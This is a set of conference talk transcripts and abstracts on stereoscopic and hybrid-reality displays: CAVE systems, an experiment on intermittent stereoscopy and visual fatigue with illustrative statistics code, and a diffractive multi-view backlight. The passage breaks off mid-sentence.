system. Couple things that jump out to me about the cave too is it quickly became a gold standard for virtual reality, virtual environment type applications and it's still popular today, 20 or more like 25 years after the first system. But it was still a purpose built device monthly for stereoscopic visualization virtuality. It was typically connected to a very expensive supercomputer for graphics. The SGI typically was a major part of any investment and yet the resolution was relatively low at the time, 10 pixels per inch type resolution no more than a megapixel per wall initially. And this was a real challenge for showing text, icons, menus, the data behind the visualization sometimes was difficult to betray or work with. Even so over the years there was a steady increase in resolution from that one megapixel up to 16 megapixels per wall and beyond that's kind of constantly evolved. Around the late 1990s we started building system called a flexible cave. The intent was that you could have a fully immersive and closing cave where you were inside the data or you could open up the sidewalls and had one triple wide display where you might do 3D visualization but less immersive more for presenting to a group. What we quickly found was customers using this type system oftentimes only opened one wall. They kept a corner cave for immersive application and would use a secondary computer for this sidewall usually showing nothing more than 2D applications, PowerPoint presentations, spreadsheets, graphs, things that complemented what was being shown in the immersive simulation. So some of the triggers that became pretty apparent in the early 2000s were of course the increasing resolution and brightness. We also saw the rise of powerful graphics computers and the kind of fading out of SGI and sun super graphics computers. 
At the same time there was this move from cave type systems being a research device to becoming part of the daily workflow in many of the companies we worked with. So being part of that daily workflow there was a pretty high expectation to support desktop applications, different types of collaboration and your typical office uses. One thing interesting to note in 2003, many universities, Mekdine and other companies began to experiment with OpenGL Interception. I don't want to get too far off in the weeds here but the beauty of OpenGL Interception was you could run a desktop application like a CAD application that used OpenGL graphics and whether the application was aware or not you could intercept calls to the graphics library, send those to a visualization cluster and re-render it for a cave. We could take an application at that time that was not intended for stereoscopic use, make it stereoscopic, immersive, interaction, head tracking, all those things could be then added to the application. Quickly expanded the way a cave or a hybrid reality type system would then be used. So we quickly jumped to several caves now around the world that have 4K resolution, 4K by 4K on each wall. If we kind of contrast that quickly, it's a 16-fold resolution increase per surface. We went from a fairly coarse data representation where text and 2D data was difficult to combine to the extreme case where without some degree of filtering and grouping of data you could display now clouds of data so dense it became difficult to work with. And so oftentimes there'd be a 2D component of these applications even though they were immersive once you started filtering you would see 2D representation of some data subset as part of the actual environment. At the same time an early adopter of 3D visualization was the oil and gas industry and instead of partitioning their display, this is like a large three channel curve screen, they really drove forward a windowing type approach. So the curve screen was treated as one big desktop and everything on it was actually a window. It could be size and position wherever you wanted. So although there might be a stereoscopic application or even something more fully immersive, it was oftentimes intermixed with video and models and other 2D data sources. So this became a true model of a hybrid environment but typically all these windows would be related to whatever the topic at hand was but they didn't necessarily interact with each other. So the simulation would be separate from a model of the rig or some of the data being shown at the same time. We also saw a few changes in the driving mechanism behind these displays, moving from projectors which we had from the very beginning to projection cubes and today a fair amount of use after the implementation of 3D TVs, the LCD flat panels going forward OLED flat panels still with some bezel. And I really predict by the end of this year, early next year, we're going to start to see displays built from DirectView LED 3D capable used for these same hybrid environments and I'd love to talk to any of you about that more after the talk this morning. So jump forward, here's an example of a University of Arkansas research lab flexible cave even though this cave uses an array of eight projection cubes per wall, it's still often used where there's an immersive application running on part of the cave and 2D presentation segmented off to one side. 
It really wasn't until 2012 when University of Illinois Electronic Visualization Lab began developing cave 2 that we saw a lot of these things for hybrid use really, really come together. The cave 2 if you haven't experienced one, you're certainly welcome to visit Mekdyne or I can't speak for Electronic Visualization Lab but it's quite a system to see it's 25 foot diameter, multiple columns of flat panel arrays and some important things here is it still supports 3D immersive applications and typically it supports some type of multimedia windowing at the same time. There's maybe six of these in the world now and smaller subsets that might be a half or a quarter of the full cave 2. Interesting note cave 2 is a trademark registered to the University of Illinois just like the name cave, I hope cave 2 becomes as generic and wide used as cave has become. So to follow on from that previous example, this is a working session where they're exploring a simulation I think it's crack propagation in a glass crystal and structure. You can imagine quite a few different scenarios around this but you have one or more stereoscopic visualizations going on. You have representations of the data through different modeling, of course they brought in a paper whether they're reviewing that for reference or maybe they're actually working on the content that goes into that paper. You can really see a wide variety of media and how people are engaged here. Because it's a windowing type system, each of these participants may actually be doing some portion of the interaction through their own laptop on a portion of the screen. So it's truly a hybrid approach depending on what resources are brought into the system. A good example, I'm far from an expert on this so I can give a few high points. The NASA endurance project lowered an autonomous vehicle into Botany Lake in the Antarctica and began doing a sonar scans mapping and water data sampling. Early on they knew ahead of time but they quickly realized that the salinity of the water was a challenge for the sonar data. In near real time with feedback, they were visualizing the data as they got it while processing it, visualizing it and making decisions about changing parameters on how the sonar was collected to improve the integrity of the data. At the same time they had this visualization running with the white markers you see that were known depth markers so they could also kind of validate accuracy of the data as it was coming in. Later on this system went to kind of a post-processing phase. That's another great example of the hybrid use of the system. You can see the gentleman with dark hair in the center is running an immersive application looking at point clouded data. At the same time a lot of the other participants are looking off to the left at more 2D representations of the data and what they're doing is they're identifying potentially bad data points, trying to make a decision about how well that fits with the surrounding data and whether or not to exclude it from the data set. So this is a very interactive cleanup phase making full use of the system. To go back to one of the flexible cave systems, this is a nice example from Hemholtz Center for Environmental Research. This is a newer oil and gas application where you have seismic representation and then an oil field with a bunch of wells. 
What's really nice about this application is it combines the 3D immersive part that what you, where you position yourself and what you select in the virtual environment, determines what's shown on the two side screens in terms of a map and data representation. So all your 2D data in this case isn't just pulled up separate, it's keyed into the application. This application does a great job of combining the two very effectively. Some of the cave two systems that I'm aware of, Mekdine provided at least three of them, are used primarily for education and research environments. So the picture to the left there is University of Illinois Electronic Visualization Lab lecture taking place in the cave two. Again this is multimedia content, some of the things on the screen are actually being brought up by students from their own laptop, some of it's being served from the system that drives the display. So a real good mix going on there. The image to the upper right is Sunshine Coast University in Eastern Australia. This is a flipped classroom model where there's work tables scattered throughout the room, but they all tie back to one large immersive display that's 3D touch, cannot often be used for lecture sharing content from one or more of the student work tables out in the room. The bottom right picture would be typical PowerPoint presentation like we use today, but there's other tools out there Prezi is one no one has used at this conference that I was aware of yet, that is more of a web based PowerPoint that could really effectively take use of this pixel real estate on a large display. And I'd certainly challenge folks that tools like that that do your presentation on a large pixel space are somewhat lacking or custom developed. Even if we had more of those tools the interaction is still a challenge, often times the interaction paradigm comes down to the specific application. Yet the number of things we have in terms of interactive wands, touch, gesture, we all carry smartphones our own personal interaction device and of course voice. Those things are not necessarily intuitive to use in the systems that make use of them have a challenge for help and guidance and using those things. Of course my pitch I think it's important to use technology integrator who's familiar with a wide range of technologies to effectively apply some of these things as well. So main challenges going forward would be there certainly is no universal control or interaction paradigm. There's a rich area of work to go on there. Multi-participant interaction, most of the applications I've worked with really are centered around a single point of interaction. At least with a windowing control, a windowing system overlaid on it, you can have multiple content and multiple participants interacting with their own content but that's kind of the extent of it. So there's definitely continued challenges around integrating 2D and 3D applications. Final thing, the broader reality most of us collaborate with remotely scattered groups. These systems definitely need more work for supporting remote participants. Thank you. I hope I have a moment for any questions.
|
Critical collaborative work session rely on sharing 2D and 3D information. Limitations in display options make it difficult to share and interact with multiple content types content simultaneously. As a result, displays capable of showing stereoscopic content are predominately used for 2D applications. This presentation will illustrate Hybrid Reality—a strategy for showing and interacting with 2D and 3D content simultaneously on the same display. Example displays, use cases, and case studies will be discussed. By using the Hybrid Reality environment, manufacturing organizations have achieved ROI with time and cost savings as well as improved collaboration for complex design problems. In higher education, Hybrid Reality displays support instruction and curriculum design by providing a process to share a wide spectrum of 2D and 3D media and applications into classroom setting. This presentation will share detailed case studies of both applications. This presentation will demonstrate how a Hybrid Reality display system can be used to effectively combine 2D and 3D content and applications for improved understanding, insight, decision making, and collaboration. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32245 (DOI)
|
Investigating intermittent stereoscopy, its effects on perception and visual fatigue. Our speaker is Ari Bouaniche. Ari has just graduated as a valedictorian from a Master of Science in Digital Creation and Publishing with a focus on virtual and augmented reality at the University of Paris 8. Thank you Mr. Chairman for this introduction. So I'm going to talk to you about intermittent stereoscopy and its effect on perception and visual fatigue. And I'd like to start with a couple of facts actually. Is this working? Yes it is. Alright, so virtual reality, which involves S3D content, is used in a growing number of industries, for prototyping for example. And it is well known that S3D aids perception of distances and curvature on the Z or the depth axis while it is very tiring to the visual system. Alright, oops, little problem with the PowerPoint. So it felt paramount to us to safeguard the visual system of people working with such tools. The second fact was something that we actually discovered in the course of a previous experiment. We were displaying S3D content to observers and we gradually decreased disparity so that we ended up with a monoscopic image. And this actually triggered no reaction whatsoever in observers, which might suggest that stereopsis is a rather weak cue. So we actually ended up thinking, well, could intermittent stereoscopy, and by this we understand displaying mono and then stereo stimuli or vice versa, could this be actually the best of both worlds? Aiding depth perception while being less tiring to the visual system. So this gave way to a number of research hypotheses. Could intermittent stereoscopy lead to a more accurate perception than mono, or at least a perception as accurate as stereo's? And by accurate we mean a perception evaluated against an ideal of correctness. Could it lead to a more precise perception than mono? And by precise we mean that results would be more consistent and less scattered than mono's. And could it lead to less fatigue and discomfort than full-on stereo? So from this we extracted our four experimental conditions, two intermittent stereo conditions, stereo at beginning, in which we displayed an S3D stimulus immediately transitioning linearly for three seconds towards a mono stimulus, and stereo at end, a mono stimulus lasting for four seconds, transitioning linearly to a stereo stimulus, and of course our two control conditions, full mono and full stereo. So let's now talk about our experiment proper. First of all the experiment was preceded and followed by measurements. Some measurements we took pre-experiment and post-experiment. Stereoacuity was measured using Titmus test circles. Fusional reserves while converging were also assessed, as well as accommodative response with a Donders push-up test and a flipper lens test of plus or minus two diopters. In pre-only we were assessing binocular status, as was suggested in one of Lambooij's papers, by submitting subjects to the Wilkins Rate of Reading test and computing the ratio of words read correctly in 2D over 3D. They said that it was a good predictor of binocular status and therefore visual fatigue. And in post-only we were actually administering a questionnaire of ten questions modeled after Zeri and Livi's source factors for visual asthenopia while watching S3D content, and subjects had to rate their answers on a continuous rating scale going from not at all to absolutely. So talking about subjects, we had a sample group of 60 individuals aged 15 to 38.
We excluded stereoblind subjects with a simple stereo fly test and we also excluded people over 40 so that accommodative response was not influenced by any presbyopia. A quick word about our experimental tasks. So the experiment consisted of four tasks which were repeated 45 times each for a total experimental time of 45 minutes including pre and post measurements. Those tasks were designed to, well, constrain subjects into taking depth decisions. The first task we called a positioning task. So a ball was traveling on the Z axis and passing under an arch, and subjects had to press a button when the ball was right under the arch. The second task we called the depth perception task. There were five spheres and six cubes, which acted as distractors, facing the camera. The cubes were interspersed with the spheres. They all had a random depth which was capped from minus one to plus one meter, and the subjects had to point to and select the sphere closest to them. The third task we deemed the curvature perception task. We displayed a cylinder and subjects had to decide whether it was curvier or flatter than usual. This put them in a forced-choice paradigm and I'll say a few words about this in a minute. The fourth task was called the collision detection task. There were two cubes facing each other and moving in opposite directions. They disappeared from the screen right before they overlapped, and subjects had to decide, if the cubes hadn't disappeared, whether they would have collided or not. Very briefly, our apparatus: for our stereoscopy hardware we had a vertical four by three meter screen, a retro-projected passive stereoscopy setup with Infitec goggles and DLP projectors. Our tracking was done by two ART infrared cameras, and constellations of passive markers were affixed onto the goggles and the flystick, enabling us to track the head and one hand of the subjects, and the interaction went through the flystick button. On the software side this was coded in C# inside of Unity 3D and this was interfaced with our immersive setup through MiddleVR. We're now going to talk about the results for perception. We processed our results through a one-way ANOVA followed by Tukey's honestly significant difference post hoc test. As for precision, we analyzed the similarity of variances with Brown-Forsythe or Bartlett tests. These are the results for task one and you can see, as for accuracy, that stereo and stereo at beginning are more accurate. As for precision, any condition involving S3D is more precise than mono, which has the largest scattering. For task two, again stereo and stereo at beginning were more accurate, and again any condition involving S3D was more precise than mono. For task three, this is when we come back to our forced-choice paradigm: we actually fitted a cumulative normal distribution curve to our data, which allowed us to compute the point of subjective equality as well as the just noticeable difference, which you see here plotted as the standard deviation of said point of subjective equality. In that task, mono and stereo at beginning were more accurate; however, stereo and, to a lesser extent, stereo at end were more precise. For task four, deciding whether the cubes had collided or not, stereo and stereo at end were more accurate while no particular condition was more precise.
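For the forced-choice curvature task, the cumulative-normal fit mentioned above can be sketched as follows. The response proportions below are made-up illustration data, not the study's measurements, and treating the fitted sigma as the JND is my reading of "plotted as the standard deviation of the point of subjective equality".

```python
import numpy as np
from scipy.optimize import curve_fit
from scipy.stats import norm

# Hypothetical curvature offsets tested (arbitrary units) and the proportion
# of "curvier than usual" answers at each level.
levels    = np.array([-0.3, -0.2, -0.1, 0.0, 0.1, 0.2, 0.3])
p_curvier = np.array([0.05, 0.12, 0.30, 0.52, 0.74, 0.90, 0.97])

def cum_normal(x, mu, sigma):
    return norm.cdf(x, loc=mu, scale=sigma)

(mu, sigma), _ = curve_fit(cum_normal, levels, p_curvier, p0=(0.0, 0.1),
                           bounds=([-1.0, 1e-3], [1.0, 1.0]))
pse = mu      # point of subjective equality
jnd = sigma   # spread of the fitted curve, plotted as precision in the talk
print(f"PSE = {pse:.3f}, JND (sigma) = {jnd:.3f}")
```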
We also had a look at response times and what we did was we plotted the proportion of response times per half second interval and then process the means of those response time through a one way ANOVA followed by two keys HSD post hoc test as well. So this is for task two and you can clearly see that there is a similarity in the graphs between mono and stereo at end and stereo and stereo at beginning. And if we have a look at the means well there were definitely faster responses in stereo and stereo at beginning. For task three again the similarity is clear between mono and stereo at end and stereo and stereo at beginning. And if we have a look at the means there were faster responses in stereo and to a lesser extent in any of the intermittent stereo conditions. Now for task four the graphs are a little different they're all very similar but we thought that was because time was more constrained quote unquote and that task as subjects felt compelled to actually respond right after the cubes had disappeared from screen. However it's still interesting to look at the means of the response times and again faster responses in stereo and stereo at beginning. Right if we now talk about results for fatigue and discomfort we process the measurements for each optometric variables that we measured through single tail pair T tests as well as a one way ANOVA analyzing the difference between post and pre measurements. We had very few significant results I'm afraid there was better stereo acuity after subjects had been submitted to the stereo condition and we wondered whether this was a sign of adaptation or a false positive. And fusion breakpoint seemed to be affected by stereo and marginally by stereo at beginning and if we had a look at the graph for that fusion breakpoint even if the ANOVA was not significant it seems that. Fusion stereo at end sorry seems to affect it the least now visual discomfort measurements were processed through a one way ANOVA for each question and a one way ANOVA that was global taking into account the sum of all scores for each question. And we also performed a linear correlation tests between the ratio for the Wilkins rate of reading test and the discomfort declared by subjects. And there was no significant difference in subjective answers between conditions and the coefficient the correlation coefficient between the rate of reading test ratio and the discomfort declared by subject was very little about point 25. So if we now try to analyze these results it seemed to us that there was a difference between simple environment and mental operations and more complex environment and mental operations by simple environments we mean environments that have only static objects or objects moving but movement is sparse happening only on one subject. And that object is traveling on one axis only more complex environments included more objects moving on several axes or more complex mental operations like evaluating a curvature and not only a distance. So in the case of simple environments it seems that disparity at task onset leads to better depth decisions which are comparable to stereo and that was the case for tasks one and two. For more complex environments or mental operations disparity when making the depth decision leads to generally more accurate decisions or decisions that are at least comparable to those of stereo and that was the case for test three and four. 
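Looping back to the statistics described above, here is a minimal sketch of a one-tailed paired t-test on a pre/post optometric measure and of the reading-ratio correlation; all numbers are invented for illustration and the variable names are hypothetical.

```python
import numpy as np
from scipy import stats

# Hypothetical pre/post values of one optometric variable (e.g. fusion break
# point, in prism dioptres) for the subjects of a single condition.
pre  = np.array([18.0, 22.0, 20.0, 25.0, 19.0, 21.0, 23.0, 20.0, 24.0, 22.0])
post = np.array([17.0, 20.0, 19.0, 23.0, 19.0, 20.0, 21.0, 19.0, 22.0, 21.0])

# Paired t-test; halve the two-sided p-value for a one-tailed test of a decrease
t, p_two = stats.ttest_rel(post, pre)
p_one = p_two / 2 if t < 0 else 1 - p_two / 2
print(f"t = {t:.2f}, one-tailed p = {p_one:.4f}")

# Correlation between the Wilkins rate-of-reading ratio and declared discomfort
wrrt_ratio = np.array([0.95, 1.02, 0.99, 1.05, 0.97, 1.01, 0.93, 1.04])
discomfort = np.array([4.2, 3.1, 5.0, 2.8, 3.9, 4.5, 5.2, 3.0])
r, p = stats.pearsonr(wrrt_ratio, discomfort)
print(f"r = {r:.2f}, p = {p:.3f}")
```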
If we now have a look at precision again the same dichotomy goes on with for simple environments and mental operation S3D at task onset leads to better precision whereas for more complex environments or mental operations further experiments would be necessary to determine whether S3D stimuli when decision making increased precision. It seems that they do for task three but not for task four. So we posited that for a simple environment it seems that the brain actually constructs a depth map of the environment which it can keep using even after disparity cues have been removed. Now if we have a look at response times initial S3D stimuli accelerate response and so we posited that if there was disparity at task onset then the brain would trust its initial judgment which would speed up response. If we now analyze fatigue and discomfort or at least the few significant results that we got we well first of all it with the results that we had it was impossible for us to claim that intermittent S3D cause less fatigue than constant S3D. However stereo at end we saw seems to affect subjects visual systems less this could possibly be explained by the time of exposure to S3D. So here are the proportions of responses per half second time intervals for tasks two and three and we actually overlaid on top of this graph the percent of disparity and it seems that for stereo at beginning 63% of responses were given while viewing S3D stimuli. Whereas for stereo at end only 49.5% of responses were given viewing S3D so it would seem that fatigue and S3D is proportional to exposure to S3D stimuli. Alright so let's now talk about future work a lot remains to be done first of all it would be extremely interesting to assess visual fatigue more accurately with more reliable tests and measurements. So replacing the TITMAS test which is known to be easily cheated because of the presence of monocular cues by a random dot stereogram test and replacing the subject dependent measurements of accommodated response by measurements made with an atoll refrectometer would be a good idea. It would also be extremely profitable to assess subjective visual discomfort in a better way than what we did here. Indeed our study for practical reasons followed a between subjects design because it was deemed very impractical to ask people to come back to the lab four times in sessions based more than 24 hours apart to ensure full visual system recovery. But next time it would be advisable to follow a within subject design even if it results in more constraints for us and for the subjects. It would also be interesting to isolate stereopsis our results were sometimes pretty pulled together probably because other depth cues ended up compensating for the absence of stereopsis. So suppressing those other cues as much as possible and especially motion parallax which was a very powerful cue would help to isolate and study how stereopsis works. Last but not least it would be extremely interesting to assess this depth map lifetime if the brain indeed creates an initial depth map of its environment then it would be extremely interesting to isolate which factors make this map obsolete and trigger its reevaluation. All right thank you very much for your attention this is also a very good time for me to thank IDFICREATIC which is a trans university innovative program sponsoring innovative teaching and research projects in which funded my coming to this conference. Thank you.
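The exposure analysis described above, the share of responses given while disparity was on screen, can be sketched like this. The response times here are synthetic, so the printed percentages will not match the 63% and 49.5% reported from the measured distributions; the transition timings follow the conditions described earlier in the talk.

```python
import numpy as np

def disparity_scale(t, condition):
    """Fraction of full stereo disparity shown at time t (seconds)."""
    if condition == "mono":
        return 0.0
    if condition == "stereo":
        return 1.0
    if condition == "stereo_at_beginning":   # full S3D at onset, linear fade to mono over 3 s
        return max(0.0, 1.0 - t / 3.0)
    if condition == "stereo_at_end":         # mono for 4 s, linear ramp to full S3D over 3 s
        return min(1.0, max(0.0, (t - 4.0) / 3.0))
    raise ValueError(condition)

# Synthetic response times (seconds), pooled over trials, for illustration only
rng = np.random.default_rng(42)
rts = rng.gamma(shape=4.0, scale=0.8, size=1000)

for cond in ("stereo_at_beginning", "stereo_at_end"):
    under_s3d = np.mean([disparity_scale(t, cond) > 0 for t in rts])
    print(f"{cond}: {100 * under_s3d:.1f}% of responses given while some disparity was shown")
```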
|
In a context of virtual reality being ubiquitous in certain industries, as well as the substantial amount of literature about the visual fatigue it causes, we wondered whether the presentation of intermittent S3D stimuli would lead to improved depth perception (over monoscopic) while reducing subjects’ visual asthenopia. In a between-subjects design, 60 individuals under 40 years old were tested in four different conditions, with head-tracking enabled: two intermittent S3D conditions (Stereo @ beginning: S3D at task onset linearly transitioning to mono in 3 seconds; Stereo @ end: monoscopic at task onset for 4 seconds, linearly transitioning to S3D in 3 seconds) and two control conditions (Mono: monoscopic images only; Stereo: constant S3D). Several optometric variables were measured pre- and post-experiment, and a subjective questionnaire assessing discomfort was administered. Our results suggest a difference between simple scenes (containing few static objects, or slow, linear movement along one axis only), and more complex environments with more diverse movement. In the former case, Stereo @ beginning leads to depth perception which is as accurate as Stereo, and any condition involving S3D leads to more precision than Mono. We posit that the brain might build an initial depth map of the environment, which it keeps using after the suppression of disparity cues. In the case of more complex scenes, Stereo @ end leads to more accurate decisions: the brain might possibly need additional depth cues to reach an accurate decision. Stereo and Stereo @ beginning also significantly decrease response times, suggesting that the presence of disparity cues at task onset boosts the brain’s confidence in its initial evaluation of the environment’s depth map. Our results concerning fatigue, while not definitive, hint at it being proportional to the amount of exposure to S3D stimuli. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32246 (DOI)
|
David Fatahou, and he's from Leia3D, and his speech will be on holographic reality. We're talking a lot about virtual reality, augmented reality these days, and what I want to present to you is a concept that we call holographic reality, which is really, we want a strong belief that virtual world is good on headset, it's very immersive, but there's a lot of application, actually a lot more that could be on headset, that could be on regular screen with the usual way that you actually interact with the digital world, which is when you want it, you turn it on, you interact with it, and then when you're done you just look away and then you're kind of back to your regular life, and that you can do with a headset. So what I want to talk about, so I'm David Fatahou, I'm the founder and CEO of a startup from Menlobark called Leia Inc., we're a spinoff from HP, and I'm going to be describing a little bit of our vision, our technology, and some of the applications, everything in less than 20 minutes, okay? So the vision of the company is this, right? I think today all of our information is obviously transitioning from the physical world to the digital world, our communication, our knowledge, the way we entertain, the way we work everything is now on servers in the cloud, yet, you know, we're still made of flesh and bones, and you know, we still essentially need to experience all that information in a physical form, which means we need to find ways, intuitive ways to bring back the digital world into our own, okay? This is fundamentally what you do with a 2D display, right? I'm trying to talk at a very abstract level here. A 2D display takes bits and bytes and essentially materializes it into a 2D image on the screen, possibly with a touch screen, you can interact with it, and you're getting essentially to interact with the digital world. And that's the way that we've been interacting with technology, it's been about 10 years now on your iPhone and so on. Obviously, you know, the same way that we transition from black and white TV to color TV, it's been a while it's been predicted we will transition from, you know, flat screens to 3D screens, okay? The world is not flat, so if you want to get a more intuitive interaction with the digital world, you should somehow be able to render the digital world in the third dimension. So recently, right, there's been a lot of craze about VR AR, and they do provide that immersion. It's actually very easy to do 3D. It's quite easy to do 3D with a VR AR headset because you just have two different displays that are following your eyes at all time. And as I said in my mini introduction earlier, right, they come at the expense of having to wear bulky eyewear, which impairs mobility, social interactions. It's quite funny actually, VR AR what happened is that you get to collaborate and to interact with people on other continents, but you're actually isolated from the person next to you, right? So if you want to maybe enjoy, you know, a football game in a bar, usually you want to be close to the people around you, you're not going to isolate yourself with the headset. And you walk in the street and you want to place a quick phone call. You don't want to, I want to have to wear a headset with a mini computer attached to your belt, you know, at all times. 
Emerging solution, right, is the topic I think of this conference is, you know, stereoscopic 3D displays, in particular naked eye 3D displays that are able to render the digital world in 3D in a completely unobstructive way, just from the screen. However, due to restriction in field of view or in the eye tracking case, there's a little bit of lag and so on and so forth, this still do not offer the total freedom of movement that you would expect from interacting with technology, right? So there's actually no good solution today and what I'm trying to present here, what we're developing at Leia is this quote-unquote holographic platform that is interactive, mobile, intuitive and that essentially lets you interact with holographic quote-unquote objects from any position in an unrestrictive way. And so this is that platform that we call holographic reality, okay? So when I say holograms, I don't want to get into the old debate about what's a hologram, you know, hologram in the broad sense that it's an object that looks and feel like a hologram which means it pops out of the screen and when you move around it, it has very smooth parallax transition and you get to see all kind of perspective around it without jumps and anything like that. So think of it as a very good, a very good multi-view 3D display, for example. And what we're building at Leia is not only we have that capability to render 3D images very, very nicely with very smooth sense of parallax but we augment it with so-called hover touch technology that lets essentially senses your finger above the screen without having to touch the screen. So we can interact with the holograms essentially without touching the screen. Some of you might have gotten a demo yesterday. I think we were there at the demo session. I think you could manipulate the skeleton by just, you know, moving your finger around the screen. It's also in our ambition to integrate so-called haptics and this is essentially ultrasonic technology. You emit ultrasound from the side of the display. If you know where your finger is located, you can actually make the ultrasound interfere in phase under your finger and you'll feel a physical sense of touch. So at that point, you'll be able not only to visualize holographic content and interact with it but you'll be able to actually feel it. So this is the digital world that is literally materialized into the real world and that's basically what we believe is going to be the user interface of the future. Might it be on your mobile phone, might be in the car, in your home, at the office and the vision for, you know, from five to ten years is our world is going to be filled with displays, every single door, every single table, every single, you know, place in your car, in your home, at the office, in public places, is going to be filled with displays, an interactive displays where you can summon the digital world, do some kind of operation and then get on with your life. All right, so that's what we're trying to build. So a little bit about the product today, what it is exactly. We managed to do that with a regular LCD technology. We're 100% compatible with the current LCD supply chain in Asia. And so what we have is we take an LCD display, we actually keep the standard LCD panel on top, you know, commodity technology, low margin and so on and so forth. There's a bunch of vendors in Asia that you can work with. 
And essentially what we do is we replace the backlight and we replace it with our own backlight that we call a multi-view backlight that has essentially some diffractive pattern on it. So it's a proprietary diffractive pattern that is able to take side illumination light and create what has become to be known as a light field. So we create a light field, a static light field underneath the LCD display. So we create a bunch of colored light rays. We know where these light rays come from. They come from different locations. They propagate in different directions. And they actually have a very controlled, and I'll come back to that, they have a very controlled angular spread. So when these light rays come through the LCD, we can modulate their intensity and what you get is a multi-view 3D image. That is not only full parallax in a wide angle, but it's actually very, has very smooth view transitions. So you don't get the usual jumps that you can see with maybe lenticular or other type of displays. It's actually very, very smooth. And because it's wide angle and because it's very smooth, it lets you essentially interact. It lets you move around the display very comfortably and it lets you interact with it. So that's the difference between having a narrow field of view and having a big field of view is when you have a big field of view, you forget about the technology and you just go on and go on with your life and essentially interact with the device. Not having to worry, am I going to lose the image or not? And the last layer that faces the user is essentially the LCD display itself, right? So unlike an anticular technology where you have to add a bunch of lenses on top, you're actually facing the LCD display. So we can use right away touch technologies, hover touch, you know, capacitive touch, and then we'll be compatible with haptics as well, essentially without having to change much of the technology. So that's essentially the product. And now I'm going to be talking a little bit more about the backlight. But first, I'm just going to talk about what kind of data needs to be fed into the display. It is still a light field display. This is still essentially multi-view 3D display. So you don't have to compute diffraction fringes or anything like that. The technology is diffraction based, but the diffraction pattern is fixed. It doesn't have to change. And it turns out all you have to feed the display are the equivalent of a certain number of views that are computed, you know, on a computer or acquired through cameras, for example. So the very noticeable fact is we can, we can, I don't like to call it crosstalk, but the way the transition, the way you transition from one view to the next is a very precise function of the diffraction pattern. And we can tune it to whatever degree we want. So we can completely kill the crosstalk. We can have zero crosstalk. Or we can introduce some crosstalk to smooth out the transition. And this is done in the hardware. So that idea of a multi-view backlight came from actually, in another life I was a researcher at HP Labs. And we actually made the cover of Nature for that in 2013. And you see another aspect that I haven't mentioned is the backlight is completely transparent. So we can create holograms that are coming, you know, that look like they're emerging from a transparent piece of glass. So it's quite magical. So here you have piece of glass, it's illuminated from the side. 
And it's essentially creating this, by our standard today, this is a horrible image. It's very blurry, everything. But that was, you know, the proof of concept back then. And because it's transparent, what it allows you to do is also, if we were to work with the transparent modulator, we could do a holographic display, 3D display that is, that is see-through transparent, okay? Which of course you can do with a parallax barrier display or a lenticular type display, right? So we can, we're compatible with see-through and 3D at the same time. So the principle is this, right? It's basically, we call it diffraction of guided wave. So if you look a little bit inside the backlight, we have a side illumination. This is, you know, this doesn't have all the full information on purpose, but just to give you a gist of how it works. You couple light from the side as in a normal backlighting system. And you have this diffractive pattern that can essentially control exactly how the light is extracted. So every time the light interacts with the diffractive pattern, a little bit is essentially diffracted there in this mode. And then most of it is just reflected and then reflected and then has the chance to interact again. So it's very efficient. In the end, we can, we managed to use most of the light in the light guide. And as I was saying, we control not only the direction and the location of this light rays, but we control exactly how they, their angular distribution. And that's very important. We can even use the same diffraction pattern to create two light rays with actually arbitrary direction. Sometime we use that to increase the density of pixels and the density of views available and so on and so forth. So it's very versatile. And a great advantage compared to a lenticular display, for example, is that diffraction doesn't care how tight the angle of the ray is going to be. If you want to send a light ray in a very grazing direction, you can. This is the same as sending it up. With a lenticular display, you need to be close to axis. If you deviate too much from the parallax approximation, you're going to get blurry images. But here you don't care. So as I mentioned before, it turns out that this diffractive pattern is going to act, is going to diffract the light that is guided in the light guide. But for light that is coming straight through, it has no diffraction effect whatsoever. So the light can go through completely unaffected. So that has to do with the transverse momentum of light. Light that is in the light guide has a very large transverse momentum, which means that in order to diffract it, you need a feature size that is pretty small. And when the light comes with near normal incidence with almost zero degree angle, it has a very small amount of momentum there. And this essentially, this grading gives too much of a momentum kick in either direction, and then there's no propagating order that corresponds to it. So again, it's completely transparent. We can give again, we have full freedom. So even if you work with the square array of LCD pixel, you can still define. You have the freedom to define an arbitrary set of views. So for example, here was an example, an early example where we build a hexagonal set of views through a square LCD panel, if you wanted to, just to show you the freedom. And again, what I alluded to that's very important to understand is that each view, we can control all aspects of the radiation pattern. 
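A small numerical illustration of the momentum argument above; the wavelength, effective index, and grating pitch are assumed round numbers for the sketch, not Leia's actual design parameters.

```python
import math

# Assumed illustration values only -- not the real backlight design.
wavelength = 0.53e-6   # green light, metres
n_eff      = 1.7       # effective index of the guided mode in the light guide
pitch      = 0.40e-6   # grating pitch, sub-wavelength

def propagating_orders(kx_over_k0):
    """Diffraction orders that escape into air for a given normalised
    in-plane momentum of the incident light (grating equation)."""
    orders = {}
    for m in range(-3, 4):
        s = kx_over_k0 - m * wavelength / pitch
        if abs(s) <= 1.0:
            orders[m] = round(math.degrees(math.asin(s)), 1)
    return orders

# Guided light carries a large in-plane momentum (n_eff * k0): some orders escape.
print("guided mode:     ", propagating_orders(n_eff))
# Normally incident light has zero in-plane momentum: only the straight-through
# order survives, so the grating looks transparent from outside.
print("normal incidence:", propagating_orders(0.0))
```

With these numbers the guided mode has two escaping orders, consistent with the remark that one pattern can create two rays, while normally incident light keeps only the straight-through order, which is why the backlight appears transparent.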
So for this one, we wanted to have a flat top, and then we wanted to control a certain amount of overlap between the views to create a certain smoothness effect. And then we also wanted the image to kind of die down. So this had eight views, horizontal views one through eight. We wanted view one and view eight to kind of die down, so that the next view, which would be view number nine, is completely suppressed. So when you look at the display and you move from the left to the right, you see a large amount of parallax, a 60-degree field of view. And then if you move too far, instead of seeing a jump back to view one, essentially the brightness decreases and the image just fades away very gracefully, right? So it doesn't jump. And at no point do you have the sensation of inverted 3D, where the left-eye image goes to the right eye and vice versa. So it is actually very pleasant. There's one usual pain with diffraction, which is how to deal with color. Everything I've described so far works well with one color. But now take the usual diffraction or holographic kind of configuration: if you send white light onto a diffraction pattern, most of you know that, first of all, most of the light will go through undiffracted. We solve that by illuminating with guided light; there is simply no zero-order propagating order, so this never happens for us. But the thing that could be more disastrous is that the first diffracted order gives you a lot of color dispersion. So essentially, and actually it's drawn wrong here, the red should be here and the blue should be there, but essentially this should completely break down the colors. You should have one color in a certain range of angles, then another color there, another color there. Most of our patents actually have to do with how we deal with that problem. We illuminate the light guide in 